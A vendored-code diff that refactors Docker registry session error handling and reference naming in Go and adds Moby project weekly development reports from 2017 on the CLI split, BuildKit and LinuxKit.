func (r *Session) GetRemoteTags(registries []string, repositoryRef reference.Named) (map[string]string, error) { - repository := repositoryRef.RemoteName() + repository := reference.Path(repositoryRef) if strings.Count(repository, "/") == 0 { // This will be removed once the registry supports auto-resolution on @@ -416,7 +418,7 @@ func buildEndpointsList(headers []string, indexEp string) ([]string, error) { // GetRepositoryData returns lists of images and endpoints for the repository func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, error) { - repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), name.RemoteName()) + repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), reference.Path(name)) logrus.Debugf("[registry] Calling GET %s", repositoryTarget) @@ -433,7 +435,7 @@ func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, erro // "Get https://index.docker.io/v1/repositories/library/busybox/images: i/o timeout" // was a top search on the docker user forum if isTimeout(err) { - return nil, fmt.Errorf("Network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy.", repositoryTarget) + return nil, fmt.Errorf("network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy", repositoryTarget) } return nil, fmt.Errorf("Error while pulling image: %v", err) } @@ -444,13 +446,13 @@ func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, erro // TODO: Right now we're ignoring checksums in the response body. // In the future, we need to use them to check image validity. 
if res.StatusCode == 404 { - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res) + return nil, newJSONError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res) } else if res.StatusCode != 200 { errBody, err := ioutil.ReadAll(res.Body) if err != nil { logrus.Debugf("Error reading response body: %s", err) } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, name.RemoteName(), errBody), res) + return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, reference.Path(name), errBody), res) } var endpoints []string @@ -537,12 +539,12 @@ func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, regist } defer res.Body.Close() if res.StatusCode == 401 && strings.HasPrefix(registry, "http://") { - return httputils.NewHTTPRequestError("HTTP code 401, Docker will not send auth headers over HTTP.", res) + return newJSONError("HTTP code 401, Docker will not send auth headers over HTTP.", res) } if res.StatusCode != 200 { errBody, err := ioutil.ReadAll(res.Body) if err != nil { - return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + return newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) } var jsonBody map[string]string if err := json.Unmarshal(errBody, &jsonBody); err != nil { @@ -550,7 +552,7 @@ func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, regist } else if jsonBody["error"] == "Image already exists" { return ErrAlreadyExists } - return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res) + return newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res) } return nil 
} @@ -591,9 +593,9 @@ func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry if res.StatusCode != 200 { errBody, err := ioutil.ReadAll(res.Body) if err != nil { - return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + return "", "", newJSONError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) } - return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res) + return "", "", newJSONError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res) } checksumPayload = "sha256:" + hex.EncodeToString(h.Sum(nil)) @@ -605,7 +607,7 @@ func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registry string) error { // "jsonify" the string revision = "\"" + revision + "\"" - path := fmt.Sprintf("repositories/%s/tags/%s", remote.RemoteName(), tag) + path := fmt.Sprintf("repositories/%s/tags/%s", reference.Path(remote), tag) req, err := http.NewRequest("PUT", registry+path, strings.NewReader(revision)) if err != nil { @@ -619,7 +621,7 @@ func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registr } res.Body.Close() if res.StatusCode != 200 && res.StatusCode != 201 { - return httputils.NewHTTPRequestError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, remote.RemoteName()), res) + return newJSONError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, reference.Path(remote)), res) } return nil } @@ -645,7 +647,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, if validate { suffix = "images" } - u := 
fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), remote.RemoteName(), suffix) + u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), reference.Path(remote), suffix) logrus.Debugf("[registry] PUT %s", u) logrus.Debugf("Image list pushed to index:\n%s", imgListJSON) headers := map[string][]string{ @@ -683,7 +685,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, if err != nil { logrus.Debugf("Error reading response body: %s", err) } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, reference.Path(remote), errBody), res) } tokens = res.Header["X-Docker-Token"] logrus.Debugf("Auth token: %v", tokens) @@ -701,7 +703,7 @@ func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, if err != nil { logrus.Debugf("Error reading response body: %s", err) } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + return nil, newJSONError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, reference.Path(remote), errBody), res) } } @@ -733,40 +735,27 @@ func shouldRedirect(response *http.Response) bool { // SearchRepositories performs a search against the remote repository func (r *Session) SearchRepositories(term string, limit int) (*registrytypes.SearchResults, error) { if limit < 1 || limit > 100 { - return nil, fmt.Errorf("Limit %d is outside the range of [1, 100]", limit) + return nil, errdefs.InvalidParameter(errors.Errorf("Limit %d is outside the range of [1, 100]", limit)) } logrus.Debugf("Index server: %s", r.indexEndpoint) u := r.indexEndpoint.String() + "search?q=" + url.QueryEscape(term) + "&n=" + url.QueryEscape(fmt.Sprintf("%d", limit)) 
req, err := http.NewRequest("GET", u, nil) if err != nil { - return nil, fmt.Errorf("Error while getting from the server: %v", err) + return nil, errors.Wrap(errdefs.InvalidParameter(err), "Error building request") } // Have the AuthTransport send authentication, when logged in. req.Header.Set("X-Docker-Token", "true") res, err := r.client.Do(req) if err != nil { - return nil, err + return nil, errdefs.System(err) } defer res.Body.Close() if res.StatusCode != 200 { - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res) + return nil, newJSONError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res) } result := new(registrytypes.SearchResults) - return result, json.NewDecoder(res.Body).Decode(result) -} - -// GetAuthConfig returns the authentication settings for a session -// TODO(tiborvass): remove this once registry client v2 is vendored -func (r *Session) GetAuthConfig(withPasswd bool) *types.AuthConfig { - password := "" - if withPasswd { - password = r.authConfig.Password - } - return &types.AuthConfig{ - Username: r.authConfig.Username, - Password: password, - } + return result, errors.Wrap(json.NewDecoder(res.Body).Decode(result), "error decoding registry search results") } func isTimeout(err error) bool { @@ -781,3 +770,10 @@ func isTimeout(err error) bool { t, ok := e.(timeout) return ok && t.Timeout() } + +func newJSONError(msg string, res *http.Response) error { + return &jsonmessage.JSONError{ + Message: msg, + Code: res.StatusCode, + } +} diff --git a/vendor/github.com/docker/docker/registry/types.go b/vendor/github.com/docker/docker/registry/types.go index 49c123a3e2..28ed2bfa5e 100644 --- a/vendor/github.com/docker/docker/registry/types.go +++ b/vendor/github.com/docker/docker/registry/types.go @@ -1,19 +1,16 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( + "github.com/docker/distribution/reference" registrytypes 
"github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" ) -// RepositoryData tracks the image list, list of endpoints, and list of tokens -// for a repository +// RepositoryData tracks the image list, list of endpoints for a repository type RepositoryData struct { // ImgList is a list of images in the repository ImgList map[string]*ImgData // Endpoints is a list of endpoints returned in X-Docker-Endpoints Endpoints []string - // Tokens is currently unused (remove it?) - Tokens []string } // ImgData is used to transfer image checksums to and from the registry @@ -60,7 +57,7 @@ var apiVersions = map[APIVersion]string{ // RepositoryInfo describes a repository type RepositoryInfo struct { - reference.Named + Name reference.Named // Index points to registry information Index *registrytypes.IndexInfo // Official indicates whether the repository is considered official. diff --git a/vendor/github.com/docker/docker/reports/2017-05-01.md b/vendor/github.com/docker/docker/reports/2017-05-01.md new file mode 100644 index 0000000000..366f4fce70 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-05-01.md @@ -0,0 +1,35 @@ +# Development Report for May 01, 2017 + +This is the 1st report, since the Moby project was announced at DockerCon. Thank you to everyone that stayed an extra day to attend the summit on Thursday. + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com/) every business day at 9am PST on the channel `#moby-project`. +During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker. + +## Topics discussed last week + +### The moby tool + +The moby tool currently lives at [https://github.com/moby/tool](https://github.com/moby/tool), it's only a temporary place and will soon be merged in [https://github.com/moby/moby](https://github.com/moby/moby). 
+ +### The CLI split + +Ongoing work to split the Docker CLI into [https://github.com/docker/cli](https://github.com/docker/cli) is happening [here](https://github.com/moby/moby/pull/32694). +We are almost done, it should be merged soon. + +### Mailing list + +Slack works great for synchronous communication, but we need to place for async discussion. A mailing list is currently being setup. + +### Find a good and non-confusing home for the remaining monolith + +Lots of discussion and progress made on this topic, see [here](https://github.com/moby/moby/issues/32871). The work will start this week. + +## Componentization + +So far only work on the builder happened regarding the componentization effort. + +### builder + +The builder dev report can be found [here](builder/2017-05-01.md) diff --git a/vendor/github.com/docker/docker/reports/2017-05-08.md b/vendor/github.com/docker/docker/reports/2017-05-08.md new file mode 100644 index 0000000000..7f03335416 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-05-08.md @@ -0,0 +1,34 @@ +# Development Report for May 08, 2017 + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`. +During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker. + +## Topics discussed last week + +### The CLI split + +The Docker CLI was successfully moved to [https://github.com/docker/cli](https://github.com/docker/cli) last week thanks to @tiborvass +The Docker CLI is now compiled from the [Dockerfile](https://github.com/moby/moby/blob/a762ceace4e8c1c7ce4fb582789af9d8074be3e1/Dockerfile#L248) + +### Mailing list + +Discourse is available at [forums.mobyproject.org](https://forums.mobyproject.org/) thanks to @thaJeztah. mailing-list mode is enabled, so once you register there, you will received every new threads / messages via email. 
So far, 3 categories were created: Architecture, Meta & Support. The last step missing is to setup an email address to be able to start a new thread via email. + +### Find a place for `/pkg` + +Lots of discussion and progress made on this [topic](https://github.com/moby/moby/issues/32989) thanks to @dnephin. [Here is the list](https://gist.github.com/dnephin/35dc10f6b6b7017f058a71908b301d38) proposed to split/reorganize the pkgs. + +### Find a good and non-confusing home for the remaining monolith + +@cpuguy83 is leading the effort [here](https://github.com/moby/moby/pull/33022). It's still WIP but the way we are experimenting with is to reorganise directories within the moby/moby. + +## Componentization + +So far only work on the builder, by @tonistiigi, happened regarding the componentization effort. + +### builder + +The builder dev report can be found [here](builder/2017-05-08.md) + diff --git a/vendor/github.com/docker/docker/reports/2017-05-15.md b/vendor/github.com/docker/docker/reports/2017-05-15.md new file mode 100644 index 0000000000..7556f9cc4a --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-05-15.md @@ -0,0 +1,52 @@ +# Development Report for May 15, 2017 + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`. +During this meeting, we are talking about the [tasks](https://github.com/moby/moby/issues/32867) needed to be done for splitting moby and docker. + +## Topics discussed last week + +### The CLI split + +Work is in progress to move the "opts" package to the docker/cli repository. The package, was merged into the docker/cli +repository through [docker/cli#82](https://github.com/docker/cli/pull/82), preserving Git history, and parts that are not +used in Moby have been removed through [moby/moby#33198](https://github.com/moby/moby/pull/33198). 
+ +### Find a good and non-confusing home for the remaining monolith + +Discussion on this topic is still ongoing, and possible approaches are looked into. The active discussion has moved +from GitHub to [https://forums.mobyproject.org/](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith/37) + +### Find a place for `/pkg` + +Concerns were raised about moving packages to separate repositories, and it was decided to put some extra effort into +breaking up / removing existing packages that likely are not good candidates to become a standalone project. + +### Update integration-cli tests + +With the removal of the CLI from the moby repository, new pull requests will have to be tested using API tests instead +of using the CLI. Discussion took place whether or not these tests should use the API `client` package, or be completely +independent, and make raw HTTP calls. + +A topic was created on the forum to discuss options: [evolution of testing](https://forums.mobyproject.org/t/evolution-of-testing-moby/38) + + +### Proposal: split & containerize hack/validate + +[@AkihiroSuda](https://github.com/AkihiroSuda) is proposing to split and containerize the `hack/validate` script and +[started a topic on the forum](https://forums.mobyproject.org/t/proposal-split-containerize-hack-validate/32). An initial +proposal to add validation functionality to `vndr` (the vendoring tool in use) was rejected upstream, so alternative +approaches were discussed. + + +### Special Interest Groups + +A "SIG" category was created on the forums to provide a home for Special Interest Groups. The first SIG, [LinuxKit +Security](https://forums.mobyproject.org/t/about-the-linuxkit-security-category/44) was started (thanks +[@riyazdf](https://github.com/riyazdf)). 
+ + +### Builder + +The builder dev report can be found [here](builder/2017-05-15.md) diff --git a/vendor/github.com/docker/docker/reports/2017-06-05.md b/vendor/github.com/docker/docker/reports/2017-06-05.md new file mode 100644 index 0000000000..63679ed033 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-06-05.md @@ -0,0 +1,36 @@ +# Development Report for June 5, 2017 + +## Daily Meeting + +A daily meeting is hosted on [slack](https://dockercommunity.slack.com) every business day at 9am PST on the channel `#moby-project`. +Lots of discussion happened during this meeting to kickstart the project, but now that we have the forums, we see less activity there. +We are discussing the future of this meeting [here](https://forums.mobyproject.org/t/of-standups-future), we will possibility move the meeting +to weekly. + +## Topics discussed last week + +### The CLI split + +Thanks to @tiborvass, the man pages, docs and completion scripts were imported to `github.com/docker/cli` [last week](https://github.com/docker/cli/pull/147) +Once everything is finalised, we will remove them from `github.com/moby/moby` + +### Find a good and non-confusing home for the remaining monolith + +Discussion on this topic is still ongoing, and possible approaches are looked into. The active discussion has moved +from GitHub to [https://forums.mobyproject.org/](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith) + + +### Find a place for `/pkg` + +Thanks to @dnephin this topic in on-going, you can follow progress [here](https://github.com/moby/moby/issues/32989) +Many pkgs were reorganised last week, and more to come this week. 
+ + +### Builder + +The builder dev report can be found [here](builder/2017-06-05.md) + + +### LinuxKit + +The LinuxKit dev report can be found [here](https://github.com/linuxkit/linuxkit/blob/master/reports/2017-06-03.md) diff --git a/vendor/github.com/docker/docker/reports/2017-06-12.md b/vendor/github.com/docker/docker/reports/2017-06-12.md new file mode 100644 index 0000000000..8aef38c6b0 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-06-12.md @@ -0,0 +1,78 @@ +# Development Report for June 12, 2017 + +## Moby Summit + +The next Moby Summit will be at Docker HQ on June 19th, register [here](https://www.eventbrite.com/e/moby-summit-tickets-34483396768) + +## Daily Meeting + +### The CLI split + +Manpages and docs yaml files can now be generated on [docker/cli](https://github.com/docker/cli). +Man pages, docs and completion scripts will be removed next week thanks to @tiborvass + +### Find a good and non-confusing home for the remaining monolith + +Lot's of dicussion happened on the [forums](https://forums.mobyproject.org/t/topic-find-a-good-an-non-confusing-home-for-the-remaining-monolith) +We should expect to do those changes after the moby summit. We contacted github to work with them so we have a smooth move. + +### Moby tool + +`moby` tool docs were moved from [LinuxKit](https://github.com/linuxkit/linuxkit) to the [moby tool repo](https://github.com/moby/tool) thanks to @justincormack + +### Custom golang URLs + +More discussions on the [forums](https://forums.mobyproject.org/t/cutoms-golang-urls), no agreement for now. + +### Buildkit + +[Proposal](https://github.com/moby/moby/issues/32925) + +More updates to the [POC repo](https://github.com/tonistiigi/buildkit_poc). It now contains binaries for the daemon and client. Examples directory shows a way for invoking a build job by generating the internal low-level build graph definition with a helper binary(as there is not support for frontends yet). 
The grpc control server binary can be built in two versions, one that connects to containerD socket and other that doesn't have any external dependencies. + +If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +#### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +New PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers. + +#### Long running session & incremental file sending + +[PR ](https://github.com/moby/moby/pull/32677) + +Same status as last week. The PR went through one pass of review from @dnephin and has been rebased again. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release. + + +#### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR is waiting for a second review. + +#### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. 
+ +#### Builder features currently in code-review: + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +#### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. diff --git a/vendor/github.com/docker/docker/reports/2017-06-26.md b/vendor/github.com/docker/docker/reports/2017-06-26.md new file mode 100644 index 0000000000..e12533ae46 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/2017-06-26.md @@ -0,0 +1,120 @@ +# Development Report for June 26, 2017 + +## Moby Summit + +The Moby Summit held in San Francisco was very active and well attended ([blog](http://mobyproject.org/blog/2017/06/26/moby-summit-recap/) / [linuxkit table notes](https://github.com/linuxkit/linuxkit/blob/master/reports/2017-06-19-summit.md) [#2090](https://github.com/linuxkit/linuxkit/pull/2090) [#2033](https://github.com/linuxkit/linuxkit/pull/2033) [@mgoelzer] [@justincormack]). + +## Container Engine + +Thanks to @fabiokung there is no container locks anymore on `docker ps` [#31273](https://github.com/moby/moby/pull/31273) + +## BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +New development repo is open at https://github.com/moby/buildkit + +The readme file provides examples how to get started. You can see an example of building BuildKit with BuildKit. + +There are lots of new issues opened as well to track the missing functionality. You are welcomed to help on any of them or discuss the design there. + +Last week most of the work was done on improving the `llb` client library for more complicated use cases and providing traces and interactive progress of executed build jobs. 
+ +The `llb` client package is a go library that helps you to generate the build definition graph. It uses chained methods to make it easy to describe what steps need to be running. Mounts can be added to the execution steps for defining multiple inputs or outputs. To prepare the graph, you just have to call `Marshal()` on a leaf node that will generate the protobuf definition for everything required to build that node. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +This PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers(eg. BuildKit). + +The PR had some review and updates in last week. Should be ready to code review soon. + +### Merged: Long running session & incremental file sending + +[PR](https://github.com/moby/moby/pull/32677) + +Incremental context sending PR was merged and is expected to land in `v17.07`. + +This feature experimental feature lets you skip sending the build context to the daemon on repeated builder invocations during development. Currently, this feature requires a CLI flag `--stream=true`. If this flag is used, one first builder invocation full build context is sent to the daemon. On a second attempt, only the changed files are transferred. + +Previous build context is saved in the build cache, and you can see how much space it takes form `docker system df`. Build cache will be automatically garbage collected and can also be manually cleared with `docker prune`. + +### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR was merged. 
+ + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +[fix copy —from conflict with force pull](https://github.com/moby/moby/pull/33735) + +### Builder features currently in code-review: + +[Fix handling of remote "git@" notation](https://github.com/moby/moby/pull/33696) + +[builder: Emit a BuildResult after squashing.](https://github.com/moby/moby/pull/33824) + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. + +## LinuxKit + +* **Kernel GPG verification:** The kernel compilation containers now verify the GPG and SHA256 + checksums before building the binaries. ([#2062](https://github.com/linuxkit/linuxkit/issues/2062) [#2083](https://github.com/linuxkit/linuxkit/issues/2083) [@mscribe] [@justincormack] [@rn] [@riyazdf]). 
+ The base Alpine build image now includes `gnupg` to support this feature ([#2091](https://github.com/linuxkit/linuxkit/issues/2091) [@riyazdf] [@rn]). + +* **Security SIG on Landlock:** The third Moby Security SIG focussed on the [Landlock](https://github.com/landlock-lsm) security module that provides unprivileged fine-grained sandboxing to applications. There are videos and forum links ([#2087](https://github.com/linuxkit/linuxkit/issues/2087) [#2089](https://github.com/linuxkit/linuxkit/issues/2089) [#2073](https://github.com/linuxkit/linuxkit/issues/2073) [@riyazdf]). + +* **Networking drivers now modules:** The kernels have been updated to 4.11.6/4.9.33/4.4.73, and many drivers are now loaded as modules to speed up boot-time ([#2095](https://github.com/linuxkit/linuxkit/issues/2095) [#2061](https://github.com/linuxkit/linuxkit/issues/2061) [@rn] [@justincormack] [@tych0]) + +- **Whaley important update:** The ASCII logo was updated and we fondly wave goodbye to the waves. ([#2084](https://github.com/linuxkit/linuxkit/issues/2084) [@thaJeztah] [@rn]) + +- **Containerised getty and sshd:** The login services now run in their own mount namespace, which was confusing people since they were expecting it to be on the host filesystem. This is now being addressed via a reminder in the `motd` upon login ([#2078](https://github.com/linuxkit/linuxkit/issues/2078) [#2097](https://github.com/linuxkit/linuxkit/issues/2097) [@deitch] [@ijc] [@justincormack] [@riyazdf] [@rn]) + +- **Hardened user copying:** The RFC on ensuring that we use a hardened kernel/userspace copying system was closed, as it is enabled by default on all our modern kernels and a regression test is included by default ([#2086](https://github.com/linuxkit/linuxkit/issues/2086) [@fntlnz] [@riyazdf]). + +- **Vultr provider:** There is an ongoing effort to add a metadata provider for [Vultr](http://vultr.com) ([#2101](https://github.com/linuxkit/linuxkit/issues/2101) [@furious-luke] [@justincormack]). 
+ +### Packages and Projects + +- Simplified Makefiles for packages ([#2080](https://github.com/linuxkit/linuxkit/issues/2080) [@justincormack] [@rn]) +- The MirageOS SDK is integrating many upstream changes from dependent libraries, for the DHCP client ([#2070](https://github.com/linuxkit/linuxkit/issues/2070) [#2072](https://github.com/linuxkit/linuxkit/issues/2072) [@samoht] [@talex5] [@avsm]). + +### Documentation and Tests + +- A comprehensive test suite for containerd is now integrated into LinuxKit tests ([#2062](https://github.com/linuxkit/linuxkit/issues/2062) [@AkihiroSuda] [@justincormack] [@rn]) +- Fix documentation links ([#2074](https://github.com/linuxkit/linuxkit/issues/2074) [@ndauten] [@justincormack]) +- Update RTF version ([#2077](https://github.com/linuxkit/linuxkit/issues/2077) [@justincormack]) +- tests: add build test for Docker for Mac blueprint ([#2093](https://github.com/linuxkit/linuxkit/issues/2093) [@riyazdf] [@MagnusS]) +- Disable Qemu EFI ISO test for now ([#2100](https://github.com/linuxkit/linuxkit/issues/2100) [@justincormack]) +- The CI whitelists and ACLs were updated ([linuxkit-ci#11](https://github.com/linuxkit/linuxkit-ce/issues/11) [linuxkit-ci#15](https://github.com/linuxkit/linuxkit-ce/issues/15) [linuxkit/linuxkit-ci#10](https://github.com/linuxkit/linuxkit-ce/issues/10) [@rn] [@justincormack]) +- Fix spelling errors ([#2079](https://github.com/linuxkit/linuxkit/issues/2079) [@ndauten]) +- Fix typo in dev report ([#2094](https://github.com/linuxkit/linuxkit/issues/2094) [@justincormack]) +- Fix dead Link to VMWare File ([#2082](https://github.com/linuxkit/linuxkit/issues/2082) [@davefreitag]) \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-01.md b/vendor/github.com/docker/docker/reports/builder/2017-05-01.md new file mode 100644 index 0000000000..73d1c49303 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-01.md @@ -0,0 +1,47 @@ +# Development 
Report for May 01, 2017 + +### buildkit + +As part of the goals of [Moby](https://github.com/moby/moby#transitioning-to-moby) to split the current platform into reusable components and to provide a future vision for the builder component new [buildkit proposal](https://github.com/moby/moby/issues/32925) was opened with early design draft. + +Buildkit is a library providing the core essentials of running a build process using isolated sandboxed commands. It is designed for extensibility and customization. Buildkit supports multiple build declaration formats(frontends) and multiple ways for outputting build results(not just docker images). It doesn't make decisions for a specific worker, snapshot or exporter implementations. + +It is designed to help find the most efficient way to process build tasks and intelligently cache them for repeated invocations. + +### Quality: Dependency interface switch + +To improve quality and performance, a new [proposal was made for switching the dependency interface](https://github.com/moby/moby/issues/32904) for current builder package. That should fix the current problems with data leakage and conflicts caused by daemon state cleanup scripts. + +@dnephin is in progress of refactoring current builder code to logical areas as a preparation work for updating this interface. 
+ +Merged as part of this effort: + +- [Refactor Dockerfile.parser and directive](https://github.com/moby/moby/pull/32580) +- [Refactor builder dispatch state](https://github.com/moby/moby/pull/32600) +- [Use a bytes.Buffer for shell_words string concat](https://github.com/moby/moby/pull/32601) +- [Refactor `Builder.commit()`](https://github.com/moby/moby/pull/32772) +- [Remove b.escapeToken, create ShellLex](https://github.com/moby/moby/pull/32858) + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enabled advanced features like incremental context send, build credentials from the client, ssh forwarding etc. is looking for initial design review. It is currently open if features implemented on top of it would use a specific transport implementation on the wire or a generic interface(current implementation). @tonistiigi is working on adding persistent cache capabilities that are currently missing from that PR. It also needs to be figured out how the [cli split](https://github.com/moby/moby/pull/32694) will affect features like this. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +These proposals have gotten mostly positive feedback for now. We will leave them open for a couple of more weeks and then decide what actions to take in a maintainers meeting. Also, if you are interested in implementing any of them, leave a comment on the specific issues. 
+ +### Other new builder features currently in code-review: + +[`docker build --iidfile` to capture the ID of the build result](https://github.com/moby/moby/pull/32406) + +[Allow builds from any git remote ref](https://github.com/moby/moby/pull/32502) + +### Backlog: + +[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first. diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-08.md b/vendor/github.com/docker/docker/reports/builder/2017-05-08.md new file mode 100644 index 0000000000..d9396ab764 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-08.md @@ -0,0 +1,57 @@ +# Development Report for May 08, 2017 + + +### Quality: Dependency interface switch + +Proposal for [switching the dependency interface](https://github.com/moby/moby/issues/32904) for current builder package. That should fix the current problems with data leakage and conflicts caused by daemon state cleanup scripts. + +Merged as part of this effort: + +- [Move dispatch state to a new struct](https://github.com/moby/moby/pull/32952) +- [Cleanup unnecessary mutate then revert of b.runConfig](https://github.com/moby/moby/pull/32773) + +In review: +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) +- [Expose GetImage interface for builder](https://github.com/moby/moby/pull/33054) + +### Merged: docker build --iidfile + +[`docker build --iidfile` to capture the ID of the build result](https://github.com/moby/moby/pull/32406). New option can be used by the CLI applications to get back the image ID of build result. API users can use the `Aux` messages in progress stream to also get the IDs for intermediate build stages, for example to share them for build cache. 
